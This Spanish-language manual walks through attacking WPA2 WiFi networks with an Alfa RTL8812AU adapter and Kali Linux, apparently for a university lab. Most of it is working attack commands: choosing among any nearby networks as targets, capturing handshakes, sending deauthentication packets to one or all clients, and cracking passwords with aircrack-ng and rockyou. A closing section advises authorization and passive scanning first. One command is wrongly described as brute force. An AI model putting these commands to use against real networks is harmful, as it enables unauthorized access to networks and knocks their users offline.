# MANUAL PENTESTING WiFi — Alpha AWUS036ACH **Chipset:** RTL8812AU | Dual-band 2.4/5GHz **Entorno:** Laboratorio universitario con Live Boot USB Kali Linux --- ## PARTE 1: INSTALAR DRIVER EN WINDOWS ### Paso 1: Descargar driver Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/ Descarga el driver Windows (RTL8812AU). ### Paso 2: Instalar 1. Desconecta la antena 2. Ejecuta el instalador como administrador 3. Reinicia el PC 4. Conecta la antena después de reiniciar ### Paso 3: Verificar Abre PowerShell y ejecuta: ``` Get-NetAdapter ``` Deberías ver la interfaz "Realtek 8812AU" con estado "Up". > En Windows solo puedes escanar redes con Acrylic WiFi Free. > Para pentesting REAL necesitas Kali Linux (Parte 2). --- ## PARTE 2: CREAR USB BOOTABLE DE KALI LINUX (CON PERSISTENCIA) ### Paso 1: Descargar Kali Ve a https://www.kali.org/get-kali/ Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB) ### Paso 2: Grabar ISO en USB con Rufus **Necesitas:** USB de 16GB mínimo + Rufus 1. Descarga Rufus desde https://rufus.ie/ 2. Inserta el USB 3. Abre Rufus 4. **Device** = tu USB 5. **Boot selection** = selecciona el ISO de Kali 6. **Partition scheme** = MBR 7. **Target system** = BIOS o UEFI 8. **Persistent storage** → mueve la barra a **8-12 GB** ⚠️ ESTO ES LO QUE CREA LA PARTICIÓN PERSISTENTE Si no la mueves, TODO se pierde al apagar 9. Haz clic en **START** 10. Selecciona **"Write in DD mode"** cuando pregunte 11. Espera a que termine (~10-15 min) --- ## PARTE 3: ARRANCAR KALI DESDE USB ### Paso 1: Configurar BIOS para arrancar desde USB 1. Reinicia el PC 2. Pulsa **F2, F12 o DEL** al encender (depende del PC) 3. En BIOS ve a "Boot" o "Boot Order" 4. Pon **"USB-HDD"** o **"Removable Device"** como primera opción 5. Guarda y sal (**F10** normalmente) ### Paso 2: Arrancar Kali 1. En el menú de GRUB selecciona **"Live system (amd64)"** 2. Usuario: `kali` / Contraseña: `kali` ### Paso 3: Conectar la antena Alpha 1. Conecta la Alpha por USB **DESPUÉS** de arrancar Kali 2. Abre terminal y verifica: ```bash lsusb # Debe aparecer: Realtek Semiconductor Corp. RTL8812AU ``` ```bash iwconfig # Debe aparecer: wlan0 o wlan1 ``` **Si NO aparece wlan0**, instala el driver: ```bash sudo apt update sudo apt install -y realtek-rtl88xxau-dkms sudo reboot ``` --- ## PARTE 4: ACTIVAR MODO MONITOR El modo monitor permite escuchar TODO el tráfico WiFi sin estar conectado a ninguna red. Es la base del pentesting. ```bash # 1. Matar procesos que interfieran sudo airmon-ng check kill # 2. Activar modo monitor sudo airmon-ng start wlan0 # 3. Verificar que está en modo monitor iwconfig wlan0mon # Debe decir: "Mode: Monitor" ``` > Si en vez de `wlan0mon` aparece `wlan0` en modo monitor, > usa `wlan0` en todos los comandos siguientes. **SALIR del modo monitor cuando termines:** ```bash sudo airmon-ng stop wlan0mon ``` --- ## PARTE 5: ESCANEAR REDES WiFi Este es el paso más importante. Aquí ves TODAS las redes a tu alrededor. ```bash sudo airodump-ng wlan0mon ``` ### Columnas de la tabla: | Columna | Significado | |---------|-------------| | **BSSID** | MAC del punto de acceso (router) | | **PWR** | Potencia de señal (-30=excelente, -90=malo) | | **Beacons** | Paquetes beacon recibidos | | **#Data** | Paquetes de datos capturados | | **CH** | Canal (1-13 en 2.4GHz, 36-165 en 5GHz) | | **ENC** | Cifrado (WPA2, WPA3, OPN=abierto) | | **ESSID** | Nombre de la red WiFi | **PARA PARAR:** pulsa `Ctrl+C` ### Consejos para elegir red objetivo: - **PWR entre -30 y -60** = buena señal (lo ideal) - **#Data alto** = hay tráfico (clientes activos) - **ENC = WPA2** (el más común, se puede crackear) - Evita OPN (abierto) y WPA3 (muy difícil) --- ## PARTE 6: CAPTURAR HANDSHAKE DE UNA RED Una vez elegida tu red objetivo (por ejemplo "CampusLab" canal 6, BSSID AA:BB:CC:DD:EE:FF): **Abre UNA NUEVA terminal** (no cierres la de escaneo) y ejecuta: ```bash sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon ``` **REEMPLAZA:** - `6` → el canal de tu red objetivo - `AA:BB:CC:DD:EE:FF` → el BSSID de tu red - `captura` → nombre del archivo de salida ### Esto hace: 1. Escucha SOLO esa red en su canal 2. Guarda todo en archivos: `captura-01.cap`, `captura-01.csv` 3. Espera a que aparezca un **"WPA handshake"** El WPA handshake aparece arriba a la derecha: ``` WPA handshake: AA:BB:CC:DD:EE:FF ``` **ESTO ES LO QUE NECESITAS** para crackear la contraseña. Si no aparece el handshake, necesitas un cliente conectándose → Parte 7. --- ## PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE) Si el handshake no aparece solo, puedes **FORZAR** a un cliente a reconectarse. Le desconecta momentáneamente y al reconectarse se captura el handshake. **ABRE UNA TERCERA terminal** y ejecuta: ```bash sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon ``` **REEMPLAZA:** - `5` → número de paquetes de deauth (5-10 suele bastar) - `AA:BB:CC:DD:EE:FF` → BSSID del router (igual que antes) - `XX:XX:XX:XX:XX:XX` → MAC del cliente conectado ### Para ver clientes conectados: Mira la terminal de la Parte 6. Bajo la columna **"STATION"** verás las MAC de los clientes. Si no sabes la MAC del cliente, puedes omitir `-c`: ```bash sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon ``` Esto envía deauth a **TODOS** los clientes de esa red. **VERIFICA** que aparezca `"WPA handshake"` en la terminal de la Parte 6 después del ataque. --- ## PARTE 8: CRACKEAR LA CONTRASEÑA Una vez tengas el WPA handshake capturado: ### Paso 1: Descomprimir el diccionario ```bash sudo gunzip /usr/share/wordlists/rockyou.txt.gz ``` ### Paso 2: Ejecutar aircrack-ng ```bash aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap ``` Sustituye `captura-01.cap` por el nombre de tu archivo. Esto prueba **TODAS** las contraseñas del diccionario contra el handshake capturado. Velocidad: ~1000-5000 claves/segundo. ### Si la contraseña está en el diccionario: ``` KEY FOUND! [ la_contraseña ] ``` ### Si no está en el diccionario: - Prueba con otro diccionario más grande - O usa fuerza bruta (mucho más lento): ```bash aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap ``` --- ## PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS) Si usas Kali Live, al reiniciar **TODO se pierde** a menos que tengas persistencia. ### Opción A — Rufus Persistent Partition (ya lo hiciste en Parte 2) Si activaste "Persistent storage" en Rufus, los archivos en `/home/kali` se guardan automáticamente entre reinicios. ### Opción B — Montar la partición persistente manualmente ```bash # Identificar la partición lsblk # Busca la partición más grande del USB (sdb3 normalmente) # Montar sudo mkdir -p /mnt/persistence sudo mount /dev/sdb3 /mnt/persistence # Copiar resultados cp captura-01.cap /mnt/persistence/ echo "RED: CampusLab | PASS: la_contraseña" > /mnt/persistence/wifi_cracked.txt # Desmontar sudo umount /mnt/persistence ``` ### Opción C — Segundo USB o red ```bash # A tu propio USB cp captura-01.cap /media/kali/MI_USB/ # O subir a un servidor scp captura-01.cap user@ip_servidor:/ruta/ ``` --- ## PARTE 10: GUARDAR LA CONTRASEÑA ```bash echo "RED: CampusLab | PASS: la_contraseña" >> ~/wifi_cracked.txt cat ~/wifi_cracked.txt ``` --- ## PARTE 11: RESUMEN DE COMANDOS RÁPIDOS | Paso | Comando | |------|---------| | Ver antena | `lsusb && iwconfig` | | Matar interferencias | `sudo airmon-ng check kill` | | Activar monitor | `sudo airmon-ng start wlan0` | | Escanear redes | `sudo airodump-ng wlan0mon` | | Capturar 1 red | `sudo airodump-ng -c CH --bssid MAC -w file wlan0mon` | | Deauth 1 cliente | `sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon` | | Crackear | `aircrack-ng -w rockyou.txt file.cap` | | Salir monitor | `sudo airmon-ng stop wlan0mon` | --- ## PARTE 12: TIPS PARA EL LABORATORIO UNIVERSITARIO 1. **Empieza solo con escaneo pasivo** (`airodump-ng`) — aprende a leer las redes antes de hacer nada activo 2. **Documenta** qué redes hay, en qué canales, qué cifrado usan 3. **Solo testea redes que tengas autorización explícita** — pide al profesor/encargado por escrito 4. **Practica primero con tu propio router** si puedes 5. El `rockyou.txt` viene en Kali en `/usr/share/wordlists/` (descomprimir con `sudo gunzip`) 6. **No hagas deauth en redes públicas reales** — es ilegal sin autorización 7. Si la señal es mala (PWR < -70), acércate al router o usa la antena con el reflector parabólico